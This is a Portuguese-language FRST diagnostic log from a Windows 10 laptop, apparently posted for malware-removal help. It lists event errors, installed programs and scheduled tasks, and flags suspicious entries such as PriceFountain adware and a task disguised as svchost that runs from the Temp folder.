Error: (01/16/2016 08:15:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Host de Sincronização_Session1.
Error: (01/16/2016 08:14:48 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
CodeIntegrity:
===================================
Date: 2016-01-14 22:20:00.250
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:14.978
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:14.956
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.146
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.098
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.057
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-13 20:40:52.871
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-10 13:27:41.415
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-09 07:57:03.183
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-08 22:12:52.173
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i5 CPU M 460 @ 2.53GHz
Percentagem de memória em uso: 60%
RAM física total: 3885.61 MB
RAM física disponível: 1529.18 MB
Virtual Total: 7853.61 MB
Virtual disponível: 5156.32 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:464.49 GB) (Free:205.35 GB) NTFS
Drive e: (Reservado pelo Sistema) (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS ==>[sistema com componentes de inicialização (obtido através de drive)]
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C456F663)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=464.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=500 MB) - (Type=27)
Partition 4: (Not Active) - (Size=450 MB) - (Type=27)
==================== Fim de Addition.txt ============================
Executado por Marcio (2016-01-16 22:08:10)
Executando a partir de C:\Users\Marcio\Downloads
Windows 10 Pro (X64) (2015-11-08 13:42:07)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-3906656628-415594203-1951508915-500 - Administrator - Disabled)
Convidado (S-1-5-21-3906656628-415594203-1951508915-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-3906656628-415594203-1951508915-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3906656628-415594203-1951508915-1002 - Limited - Enabled)
Marcio (S-1-5-21-3906656628-415594203-1951508915-1001 - Administrator - Enabled) => C:\Users\Marcio
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
"Just Cause 2" (HKLM-x32\...\{E2FC9928-87BE-4947-B68E-4A3414E33767}_is1) (Version: - )
µTorrent (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.)
3DP Chip v15.10 (HKLM-x32\...\3DP Chip) (Version: v15.10 - 3DP)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\Akamai) (Version: - Akamai Technologies, Inc)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0031 - ASUS)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 3.8.5187 - DsNET Corp)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Bully. Scholarship Edition (HKLM-x32\...\Bully. Scholarship Edition_R.G. Mechanics_is1) (Version: - R.G. Mechanics, SeRaph1)
Cabal Nexus Games (HKLM-x32\...\{D8759F70-F3EF-47F3-AADB-3FE46EE508A6}_is1) (Version: 12.50 - Nexus Games, Inc.)
Call of Duty Modern Warfare 3 version 1.0 (HKLM-x32\...\{4B7IL77L-LKS1-75B1-CODMW3-18CD6E6334R1}_is1) (Version: 1.0 - Activision)
CCleaner (HKLM\...\CCleaner) (Version: 5.0 - Piriform)
Cheat Engine 6.1 (HKLM-x32\...\Cheat Engine 6.1_is1) (Version: - Dark Byte)
Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{B865FDD4-E96E-4166-BB69-6E8C207E3E29}) (Version: 17.0.0.491 - Corel Corporation)
Corel Graphics - Windows Shell Extension (x32 Version: 17.0.491 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 64 Bit (Version: 17.0.491 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - BR (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Capture (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Common (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Connect (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Custom Data (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Draw (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Filters (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - FontNav (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM Content (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM T (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - PHOTO-PAINT (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Photozoom Plugin (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Redist (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Setup Files (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VBA (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VideoBrowser (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Writing Tools (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 (HKLM-x32\...\_{C5D9CECB-A66F-473F-B406-5C8C2DCA4DF0}) (Version: 17.0.0.491 - Corel Corporation)
CorelDRAW Graphics Suite X7 (x32 Version: 17.0 - Corel Corporation) Hidden
Counter-Strike 1.6 (HKLM-x32\...\Counter-Strike 1.6) (Version: - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0114 - Disc Soft Ltd)
Deadpool (HKLM-x32\...\Deadpool_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
Driver Magician 4.5 (HKLM-x32\...\Driver Magician_is1) (Version: - GoldSolution Software, Inc.)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Garena+ (HKLM-x32\...\im) (Version: 2011 - Garena Online Pte Ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2993 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.4.1000 - Intel Corporation)
JMicron Ethernet Adapter NDIS Driver (HKLM-x32\...\{96DCEE2F-98EE-4F80-8C0F-7C04D1FB9D7F}) (Version: 6.0.23.4 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.67.0 - JMicron Technology Corp.)
Malwarebytes Anti-Malware versão 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
Minimal ADB and Fastboot version 1.1.3 (HKLM-x32\...\{DE46417A-9E9E-4BCD-BBDD-DA21943193BB}_is1) (Version: 1.1.3 - )
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Need for Speed™ Undercover (HKLM-x32\...\{E6D22FE1-AB5F-42CA-9480-6F70B96DDD88}) (Version: 1.0.1.0 - Electronic Arts)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Pacote de Driver do Windows - Intel (HECIx64) System (09/17/2009 6.0.0.1179) (HKLM\...\30A4777E896192B8D398199AE1AB235B69BAB26D) (Version: 09/17/2009 6.0.0.1179 - Intel)
Pacote de Driver do Windows - Intel (Impcd) System (02/26/2010 01.02.00.1002) (HKLM\...\72A1288AD1FD92CA44C28F8A5B2B982B4569234E) (Version: 02/26/2010 01.02.00.1002 - Intel)
Pacote de Driver do Windows - Qualcomm Atheros Communications Inc. (athr) Net (08/14/2015 10.0.0.326) (HKLM\...\56B1A735BC0841E802E7BB371D433BD236941875) (Version: 08/14/2015 10.0.0.326 - Qualcomm Atheros Communications Inc.)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
Payday The Heist (c) OVERKILL Software version 1 (HKLM-x32\...\Payday The Heist (c) OVERKILL Software_is1) (Version: 1 - )
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
PointBlank (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\PointBlank) (Version: 2.1.0 - Ongame S.A & Zepetto)
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.7.9 - KWPWIRQLZCT) <==== ATENÇÃO
PS TO PC CONVERTER (HKLM-x32\...\{A483F88A-41E9-45B2-AAC9-A823DD9B4873}) (Version: 2006.5.26 - )
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.3.19.0 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.34.1130.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7571 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Resident Evil 4 1.10 (HKLM-x32\...\Resident Evil 4_is1) (Version: - )
Rocket League Chaos Run (HKLM-x32\...\Rocket League Chaos Run_is1) (Version: - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Sniper Elite (HKLM-x32\...\Sniper Elite_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
Software de dispositivo do Chipset Intel® (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
SPORE™ (HKLM-x32\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Spotify (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\Spotify) (Version: 1.0.19.106.gb8a7150f - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
True Crime® New York City (HKLM-x32\...\{C920EFB6-59DB-472D-B445-21821477AD17}) (Version: 1.00.0000 - Aspyr Media, Inc.)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.30.3 - ASUS)
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-3906656628-415594203-1951508915-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Marcio\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {061FEADF-9758-47D1-AF49-26E548CD1C26} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {0D2E1CD1-35CC-455D-B06C-F4835DD49C3A} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {14E98FB6-2CE9-4E8B-9FB3-A044080E2CE7} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {20453C22-D886-47E7-8173-C05CD592B5EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {23F1ACAA-DA8C-41F4-B2BE-7803DF9E9D09} - System32\Tasks\{E1F7F0A5-253E-4658-BFB9-19DD8DE6B4EA} => pcalua.exe -a C:\Users\Marcio\AppData\Local\Temp\uninstallmodule.exe -d C:\Users\Marcio\AppData\Local\Temp
Task: {2685596C-4224-41C6-93A4-2480FB89B059} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-18] (Google Inc.)
Task: {291B9C61-B0C7-4F0B-94AA-DE1984141E6A} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-01-08] (Realtek Semiconductor)
Task: {33DC02B3-1BB4-4DF0-AF2F-0C54F56CB2DC} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {3C240A37-FCCC-4C62-AAFC-D02AE2D87134} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2016-01-08] (Realtek Semiconductor)
Task: {452E843E-8D47-4E36-8D6F-3CF6AD341FF5} - \crash_service -> Nenhum Arquivo <==== ATENÇÃO
Task: {469FB128-50BD-478E-B4DC-D9D04C710FA0} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {4CF2BC1A-F781-4B92-92E0-BF2D7195F5CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {4D90F36B-0221-4A27-B94F-F1E7E8FF049B} - System32\Tasks\{2A6A6C0A-6DF1-4478-807F-2FF9BF46B935} => C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\InstallHelp.exe [2015-05-15] () <==== ATENÇÃO
Task: {4DEC28DF-7AC9-4DA2-8B27-F3EE658A4A9C} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {57BEC164-C526-43D3-A481-FCC6CCAE60DC} - System32\Tasks\Uumdigeu => C:\ProgramData\Uumdigeu\1.0.7.1\ksupsuus.exe
Task: {58422721-F7B0-45E6-B485-0C32FF1A7710} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {5B07D843-6AC5-4118-9779-A5B84A9EBD80} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {5D31DB1F-EE88-4C70-84B1-23013F926F1B} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {62FDEBF5-57F6-4889-818D-1DEC5D247EBE} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-13] (Piriform Ltd)
Task: {7192C381-D3AD-4224-A6D0-B7BF1F8C1DA7} - System32\Tasks\{1B094A35-6227-41B1-BC90-24BA5499CA4A} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe"
Task: {79FE3EB8-F71A-4D6A-9EDB-38E8580827BF} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {7A07AA65-105B-43DA-8546-54B85D52DD57} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {7C1D662B-E224-4E1C-8FF1-0F8864513362} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {7E9F0B9E-30E2-4234-B47C-0F6EDE528703} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {7FCA28E4-30E7-40E3-B0D9-AABCDC9B1A28} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {82114C91-2CC6-4F93-A0B1-755B71990B59} - System32\Tasks\svchost => C:\Users\Marcio\AppData\Local\Temp\R8WB8RF3U.exe <==== ATENÇÃO
Task: {82A9008C-61FF-44C6-87E8-29D917C62070} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {89396946-4560-4928-8C3D-ADEB45DB5D87} - \Run_Bobby_Browser -> Nenhum Arquivo <==== ATENÇÃO
Task: {8D9B55C3-950F-4970-89D7-E106867B5275} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-13] (Microsoft Corporation)
Task: {8EC4902F-DCF2-4D18-A5A1-FC8442EADC79} - System32\Tasks\{8C3535FB-30E3-431E-98FE-3C5970869DB6} => pcalua.exe -a D:\VL813.exe
Task: {92E29EC9-DDAE-468F-B413-2D35D75ECDD4} - System32\Tasks\{65A4EB63-286F-4195-8F92-FBFB1F7C021E} => pcalua.exe -a "C:\Program Files (x86)\ttwifi\unins000.exe"
Task: {9A7623E2-DD4F-435B-BE53-73D3B2E2245F} - System32\Tasks\{0E3CF564-B6FA-49DD-8E55-0ADBDC94A107} => pcalua.exe -a "C:\Program Files (x86)\WeatherTool\2.0.0.11150\InstallHelper.exe" -c -Uninstall English
Task: {9F957308-9DEA-4670-B71E-1B5999A14DD7} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {A373B047-44EC-4E1F-B472-8DEEA060717D} - System32\Tasks\{C79FF0C8-9AE3-4E40-BB5B-A908DBD75074} => pcalua.exe -a C:\Users\Marcio\Downloads\gfwlivesetup.exe -d C:\Users\Marcio\Downloads
Task: {A564D676-7F6B-46AE-992D-83F35486E2D6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {A5D52503-DE44-4447-A2D0-FC18555A9C57} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {A6A24E59-BB4E-4D07-859A-D770F2B97F64} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {A799C960-9E1B-4D3D-AE39-6F307A14E905} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B218A4D5-0C9A-49DF-9254-2E8BF77B9A05} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B954AB9F-9ED3-41C9-B8A1-C028021ACAB5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {BB8014C9-8185-412B-937B-5202F77092C9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-18] (Google Inc.)
Task: {BCF4F39A-0CC7-4909-8C6D-8744E56721A7} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {BDE784C1-C6ED-4B8F-8233-6BF61EB8BE3A} - System32\Tasks\{08660FA5-E614-4722-83B3-6723975F8DE1} => pcalua.exe -a "C:\Users\Marcio\Desktop\Nova pasta\Tradução.exe" -d "C:\Users\Marcio\Desktop\Nova pasta"
Task: {BE26A94B-1105-41B6-8C5C-86873F2D6497} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2013-09-09] (ASUSTek Computer Inc.)
Task: {BFA75651-A6A6-4502-A153-33E80DFCEF05} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {BFDB5F72-05EA-4B18-9859-E2648FCE624A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {C36A41C1-BF65-4E22-962D-3990CEFE777E} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {D5102D8D-F343-4064-9810-4C5B24113547} - System32\Tasks\Garena+ Plugin Host Service => C:\Program Files (x86)\Garena Plus\ggdllhost.exe [2015-12-08] ()
Task: {DBBEE747-2037-4CBE-A07D-167F85B847F0} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {DFBD71E3-BF72-4896-B63C-4F439B9D9DE2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E14122B9-5332-43C5-AC05-0EE645637440} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {E81F727A-AEB2-471E-AA14-7CFDCE77CCA4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
